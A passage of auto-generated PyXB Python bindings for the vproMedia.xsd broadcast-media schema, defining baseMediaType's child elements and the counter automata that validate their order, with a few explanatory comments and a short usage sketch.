locationTableType._Automaton = _BuildAutomaton_10()
scheduleEventsType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'scheduleEvent'), scheduleEventType, scope=scheduleEventsType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 726, 6)))
def _BuildAutomaton_11 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_11
del _BuildAutomaton_11
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 726, 6))
counters.add(cc_0)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(scheduleEventsType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'scheduleEvent')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 726, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
scheduleEventsType._Automaton = _BuildAutomaton_11()
locationsType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'location'), locationType, scope=locationsType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 805, 6)))
def _BuildAutomaton_12 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_12
del _BuildAutomaton_12
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 805, 6))
counters.add(cc_0)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(locationsType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'location')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 805, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
locationsType._Automaton = _BuildAutomaton_12()
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'crid'), pyxb.binding.datatypes.anyURI, scope=baseMediaType, documentation='\n A crid (content reference identifier) is a reference to an entity in another system. E.g. a crid like\n crid://broadcast.radiobox2/335793 refers to a broadcast with id 335793 in Radiobox. A crid must be a valid\n URI starting with "crid://". Crids must be unique, but they can be made up freely. It is a good idea to use\n a logical structure which can easily be associated with another system. Any POMS object can have zero or\n more crids. They can refer to different systems, but a POMS object could also actually represent more than\n one entity in a remote system.\n ', location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 225, 6)))
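# Hand-added usage sketch (not generated): per the crid documentation above,
# crids are free-form but must be URIs with the crid:// scheme, and a media
# object carries zero or more of them, so the binding exposes a list-like
# property. The example value is the one quoted in the schema documentation.
def _crid_usage_sketch(media_obj):
    media_obj.crid.append('crid://broadcast.radiobox2/335793')
    return media_obj.crid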
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'broadcaster'), broadcasterType, scope=baseMediaType, documentation='\n One or more broadcasters can be the owner of a POMS media object. This information is meta information about the object, but it is also used\n for assigning write access to the object in the POMS backend to employees of these given broadcasting companies.\n ', location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 237, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'portal'), organizationType, scope=baseMediaType, documentation="\n          Optionally 'portals' can be assigned to a media object. Portals are also 'owners', and employees can also work for a certain portal.\n          This is because some portals are shared by several broadcasting companies.\n        ", location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 245, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'exclusive'), portalRestrictionType, scope=baseMediaType, documentation="\n          Besides having portals, which mainly indicates where the object originates, a media object can also be assigned 'portal restrictions'.\n          If a media object has any portal restrictions, the media object may only be shown on these portals.\n        ", location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 253, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'region'), geoRestrictionType, scope=baseMediaType, documentation="\n Media with a geo restriction can only be played in the indicated region (NL, BENELUX, WORLD). This\n restriction doesn't apply to the metadata of the media object. It only applies to the actual playable content.\n ", location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 261, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'title'), titleType, scope=baseMediaType, documentation='\n          A media object has one or more titles. All titles have a type (MAIN, SUB etc.) and an owner (BROADCASTER, MIS etc.).\n          The combination of type and owner is always unique for a particular media object, so a media object cannot\n          have multiple titles of the same type and owner. Titles are sorted in order of the textualTypeEnum and then in order\n          of ownerTypeEnum when published, so the first title in a published document will be a title owned by BROADCASTER of type\n          MAIN, if that title exists.\n        ', location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 269, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'description'), descriptionType, scope=baseMediaType, documentation='\n Optional descriptions for the media object. Descriptions have an owner and a type, and are ordered just like titles.\n ', location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 280, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'genre'), genreType, scope=baseMediaType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 287, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'tag'), tagType, scope=baseMediaType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 288, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'intentions'), intentionType, scope=baseMediaType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 289, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'targetGroups'), targetGroupsType, scope=baseMediaType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 290, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'geoLocations'), geoLocationsType, scope=baseMediaType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 291, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'topics'), topicsType, scope=baseMediaType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 292, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'source'), pyxb.binding.datatypes.string, scope=baseMediaType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 293, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'country'), countryType, scope=baseMediaType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 294, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'language'), languageType, scope=baseMediaType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 295, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'isDubbed'), pyxb.binding.datatypes.boolean, scope=baseMediaType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 296, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'availableSubtitles'), availableSubtitleType, scope=baseMediaType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 297, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'avAttributes'), avAttributesType, scope=baseMediaType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 298, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'releaseYear'), pyxb.binding.datatypes.short, scope=baseMediaType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 299, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'duration'), pyxb.binding.datatypes.duration, scope=baseMediaType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 300, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'credits'), creditsType, scope=baseMediaType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 301, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'award'), pyxb.binding.datatypes.string, scope=baseMediaType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 302, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'descendantOf'), descendantRefType, scope=baseMediaType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 303, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'memberOf'), memberRefType, scope=baseMediaType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 304, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ageRating'), ageRatingType, scope=baseMediaType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 305, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'contentRating'), contentRatingType, scope=baseMediaType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 306, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'email'), pyxb.binding.datatypes.anyURI, scope=baseMediaType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 307, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'website'), websiteType, scope=baseMediaType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 308, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'twitter'), twitterType, scope=baseMediaType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 309, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'teletext'), pyxb.binding.datatypes.short, scope=baseMediaType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 310, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'prediction'), predictionType, scope=baseMediaType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 311, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'locations'), locationsType, scope=baseMediaType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 312, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'relation'), relationType, scope=baseMediaType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 313, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'images'), imagesType, scope=baseMediaType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 314, 6)))
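# ---------------------------------------------------------------------------
# Content model automaton for baseMediaType.
#
# _BuildAutomaton_13 below constructs a finite automaton with counters (FAC,
# see pyxb.utils.fac) that enforces the order and multiplicity of the child
# elements declared above: every element registered with _AddElement becomes
# one automaton state, and every minOccurs/maxOccurs constraint becomes a
# counter condition.
#
# A minimal usage sketch of these bindings (assumptions: this generated
# module is importable as `vproMedia` and, like other PyXB binding modules,
# exposes the standard CreateFromDocument() entry point; 'program.xml' is a
# hypothetical document valid against vproMedia.xsd):
#
#     import vproMedia
#     with open('program.xml', 'rb') as f:
#         media = vproMedia.CreateFromDocument(f.read())
#     # Child elements are exposed as attributes named after the schema;
#     # repeated elements (crid, title, ...) behave like Python sequences.
#     for crid in media.crid:
#         print(crid)
#     print(media.title[0].value())  # titles sort BROADCASTER/MAIN first
# ---------------------------------------------------------------------------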
def _BuildAutomaton_13 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_13
del _BuildAutomaton_13
import pyxb.utils.fac as fac
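    # Counter conditions: one per occurrence-constrained particle of the
    # content model. min/max mirror the schema's minOccurs/maxOccurs;
    # max=None stands for maxOccurs="unbounded", and min=0, max=1 marks an
    # optional singleton element.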
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 225, 6))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 245, 6))
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 253, 6))
counters.add(cc_2)
cc_3 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 261, 6))
counters.add(cc_3)
cc_4 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 280, 6))
counters.add(cc_4)
cc_5 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 287, 6))
counters.add(cc_5)
cc_6 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 288, 6))
counters.add(cc_6)
cc_7 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 289, 6))
counters.add(cc_7)
cc_8 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 290, 6))
counters.add(cc_8)
cc_9 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 291, 6))
counters.add(cc_9)
cc_10 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 292, 6))
counters.add(cc_10)
cc_11 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 293, 6))
counters.add(cc_11)
cc_12 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 294, 6))
counters.add(cc_12)
cc_13 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 295, 6))
counters.add(cc_13)
cc_14 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 296, 6))
counters.add(cc_14)
cc_15 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 297, 6))
counters.add(cc_15)
cc_16 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 298, 6))
counters.add(cc_16)
cc_17 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 299, 6))
counters.add(cc_17)
cc_18 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 300, 6))
counters.add(cc_18)
cc_19 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 301, 6))
counters.add(cc_19)
cc_20 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 302, 6))
counters.add(cc_20)
cc_21 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 303, 6))
counters.add(cc_21)
cc_22 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 304, 6))
counters.add(cc_22)
cc_23 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 305, 6))
counters.add(cc_23)
cc_24 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 306, 6))
counters.add(cc_24)
cc_25 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 307, 6))
counters.add(cc_25)
cc_26 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 308, 6))
counters.add(cc_26)
cc_27 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 309, 6))
counters.add(cc_27)
cc_28 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 310, 6))
counters.add(cc_28)
cc_29 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 311, 6))
counters.add(cc_29)
cc_30 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 312, 6))
counters.add(cc_30)
cc_31 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 313, 6))
counters.add(cc_31)
cc_32 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 314, 6))
counters.add(cc_32)
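    # States: one per child element particle, in content-model order. Each
    # state's symbol ties it to the ElementUse registered through _AddElement
    # above. is_initial marks elements that may start the content (crid is
    # optional, so broadcaster can also open it); final_update=None means the
    # state cannot legally end the content, while a set of update
    # instructions lists the counters that must be satisfied if it does.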
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'crid')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 225, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = None
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'broadcaster')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 237, 6))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = None
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'portal')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 245, 6))
st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = None
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'exclusive')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 253, 6))
st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = None
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'region')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 261, 6))
st_4 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
final_update = set()
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'title')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 269, 6))
st_5 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_5)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_4, False))
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'description')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 280, 6))
st_6 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_6)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_5, False))
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'genre')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 287, 6))
st_7 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_7)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_6, False))
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'tag')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 288, 6))
st_8 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_8)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_7, False))
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'intentions')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 289, 6))
st_9 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_9)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_8, False))
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'targetGroups')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 290, 6))
st_10 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_10)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_9, False))
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'geoLocations')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 291, 6))
st_11 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_11)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_10, False))
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'topics')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 292, 6))
st_12 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_12)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_11, False))
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'source')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 293, 6))
st_13 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_13)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_12, False))
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'country')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 294, 6))
st_14 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_14)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_13, False))
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'language')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 295, 6))
st_15 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_15)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_14, False))
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'isDubbed')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 296, 6))
st_16 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_16)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_15, False))
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'availableSubtitles')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 297, 6))
st_17 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_17)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_16, False))
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'avAttributes')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 298, 6))
st_18 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_18)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_17, False))
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'releaseYear')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 299, 6))
st_19 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_19)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_18, False))
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'duration')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 300, 6))
st_20 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_20)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_19, False))
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'credits')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 301, 6))
st_21 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_21)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_20, False))
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'award')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 302, 6))
st_22 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_22)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_21, False))
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'descendantOf')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 303, 6))
st_23 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_23)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_22, False))
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'memberOf')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 304, 6))
st_24 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_24)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_23, False))
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'ageRating')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 305, 6))
st_25 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_25)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_24, False))
